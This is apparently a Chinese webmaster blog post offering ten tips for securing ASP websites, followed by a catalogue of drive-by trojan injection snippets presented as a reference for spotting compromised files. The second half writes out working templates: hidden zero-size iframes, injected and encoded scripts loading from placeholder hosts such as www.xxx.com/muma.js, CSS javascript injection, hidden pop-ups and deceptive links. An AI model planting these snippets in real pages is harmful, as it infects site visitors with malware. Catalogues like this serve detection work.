網站運行穩定,是各位站長最想看到的,一分耕耘一分收獲維護網站安全得用心得細心,那么如何保證網站安全,如果出現被掛馬如何辨別,眾生網絡 在此分享下幾個方法,不管你懂不懂程序都能做到!
1、建議用戶通過ftp來上傳、維護網頁,盡量不安裝asp的上傳程序。
2、對asp上傳程序的調用一定要進行身份認證,并只允許信任的人使用上傳程序。
這其中包括各種新聞發布、商城及論壇程序,只要可以上傳文件的asp都要進行身份認證!
3、asp程序管理員的用戶名和密碼要有一定復雜性,不能過于簡單,還要注意定期更換。
4、到正規網站下載asp程序,下載后要對其數據庫名稱和存放路徑進行修改,數據庫文件名稱也要有一定復雜性。
5、要盡量保持程序是最新版本。
6、不要在網頁上加注后臺管理程序登陸頁面的鏈接。
7、為防止程序有未知漏洞,可以在維護后刪除后臺管理程序的登陸頁面,下次維護時再通過ftp上傳即可。
8、要時常備份數據庫等重要文件。
9、日常要多維護,并注意空間中是否有來歷不明的asp文件。記住:一分汗水,換一分安全!
10、一旦發現被入侵,除非自己能識別出所有木馬文件,否則要刪除所有文件。
重新上傳文件前,所有asp程序用戶名和密碼都要重置,并要重新修改程序數據庫名稱和存放路徑以及后臺管理程序的路徑。
做好以上防范措施,您的網站只能說是相對安全了,決不能因此疏忽大意,因為入侵與反入侵是一場永恒的戰爭
E.掛馬代碼大全
ps:檢查文件是否被掛馬的時候可以參考下!
一:框架掛馬
<iframe src=地址 width=0 height=0></iframe>
二:js文件掛馬
首先將以下代碼
document.write(“<iframe width=’0′ height=’0′ src=’地址’></iframe>”);
保存為xxx.js,
則JS掛馬代碼為
<script language=javascript src=xxx.js></script>
三:js變形加密
<script language=”Jscript.Encode” src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后綴
四:body掛馬
<body ></body>
五:隱蔽掛馬
top.document.body.innerHTML = top.document.body.innerHTML + ‘rn<iframe src=”http://www.xxx.com/muma.htm/”></iframe>’;
六:css中掛馬
body {
background-image: url(‘javascript:document.write(“<script src=http://www.XXX.net/muma.js></script>”)’)}
七:JAJA掛馬
<script language=javascript>
window.open (“地址”,”",”toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1″);
</script>
八:圖片偽裝
<html>
<iframe src=”網馬地址” height=0 width=0></iframe>
<img src=”圖片地址”></center>
</html>
九:偽裝調用:
<frameset rows=”444,0″ cols=”*”>
< frame src=”打開網頁” framborder=”no” scrolling=”auto” noresize marginwidth=”0″margingheight=”0″>
<frame src=”網馬地址” frameborder=”no” scrolling=”no” noresize marginwidth=”0″margingheight=”0″>
</frameset>
十:高級欺騙
<a href=”http://www.*****.com(迷惑連接地址,顯示這個地址指向木馬地址)” > 頁面要顯示的內容 </a>
< script Language=”Javascript”>
function www_163_com ()
{
var url=”網馬地址”;
open(url,”NewWindow”,”toolbar=no,location=no,directories=no,
status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10″);
}
</script>